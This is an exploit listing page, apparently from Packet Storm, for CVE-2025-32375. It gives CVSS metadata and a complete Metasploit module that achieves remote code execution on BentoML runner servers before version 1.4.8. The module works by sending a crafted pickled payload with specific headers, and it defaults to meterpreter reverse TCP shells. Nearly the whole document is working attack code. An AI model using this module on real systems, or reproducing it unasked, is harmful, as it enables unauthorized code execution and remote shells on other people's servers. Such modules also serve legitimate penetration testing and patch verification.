Exploit Details
Basic Information
| Exploit Title | BentoML Runner Server Remote Code Execution |
|---|---|
| Exploit ID | PACKETSTORM:190623 |
| Type | packetstorm |
| Published | 2025-04-23T00:00:00 |
| Modified | 2025-04-23T00:00:00 |
CVSS Information
| CVSS Score | 9.8 |
|---|---|
| Severity | CRITICAL |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
CVE Information
- CVE-2025-32375
Exploit Description
Exploit Code
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘BentoML\’s runner server RCE’,
‘Description’ => %q{
There was an insecure deserialization in BentoML’s runner server prior to version 1.4.8.
By setting specific headers and parameters in the POST request, it is possible to execute unauthorized arbitrary code in the context of the user running the server,
which will grant initial access and information disclosure.
},
‘Author’ => [
‘SeaWind’, # Vulnerability discovery and PoC
‘Takahiro Yokoyama’ # Metasploit module
],
‘License’ => MSF_LICENSE,
‘References’ => [
[‘CVE’, ‘2025-32375’],
[‘URL’, ‘https://github.com/advisories/GHSA-7v4r-c989-xh26’],
],
‘Targets’ => [
[
‘Python payload’,
{
‘Arch’ => ARCH_PYTHON,
‘Platform’ => ‘python’,
‘Type’ => :python,
‘DefaultOptions’ => { ‘PAYLOAD’ => ‘python/meterpreter/reverse_tcp’ }
}
],
[
‘Linux Command’, {
‘Arch’ => [ ARCH_CMD ], ‘Platform’ => [ ‘unix’, ‘linux’ ], ‘Type’ => :nix_cmd,
‘DefaultOptions’ => {
# defaults to cmd/linux/http/aarch64/meterpreter/reverse_tcp
‘PAYLOAD’ => ‘cmd/linux/http/x64/meterpreter_reverse_tcp’
}
}
],
],
‘DefaultOptions’ => {
‘FETCH_DELETE’ => true
},
‘DefaultTarget’ => 0,
‘DisclosureDate’ => ‘2025-04-09’,
‘Notes’ => {
‘Stability’ => [ CRASH_SAFE, ],
‘SideEffects’ => [ IOC_IN_LOGS ],
‘Reliability’ => [ REPEATABLE_SESSION, ]
}
)
)
register_options(
[
Opt::RPORT(3000)
]
)
end
def check
res = send_request_cgi({
‘method’ => ‘GET’,
‘uri’ => normalize_uri(target_uri.path, ‘metrics’)
})
return Exploit::CheckCode::Unknown(‘Unexpected server reply.’) unless res&.code == 200
return Exploit::CheckCode::Unknown(‘BentoML\’s runner server not detected.’) unless res&.get_html_document&.text&.include?(‘bentoml_runner’)
res = send_request_cgi({
‘method’ => ‘GET’,
‘uri’ => normalize_uri(target_uri.path, ‘readyz’)
})
return Exploit::CheckCode::Unknown(‘BentoML\’s runner server not ready.’) unless res&.code == 200
Exploit::CheckCode::Detected(“BentoML\’s runner server detected.”)
# Version check not available
end
def exploit
if target[‘Type’] == :python
pl = payload.encoded
else
pl = “import os;os.system(\”\”\”\n#{payload.encoded}\n\”\”\”)”
end
send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path),
‘headers’ => {
‘args-number’ => ‘1’,
‘Content-Type’ => ‘application/vnd.bentoml.pickled’,
‘Payload-Container’ => ‘NdarrayContainer’,
‘Payload-Meta’ => ‘{“format”: “default”}’,
‘Batch-Size’ => ‘-1’
},
‘data’ => Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, pl)
})
# No response check here
end
end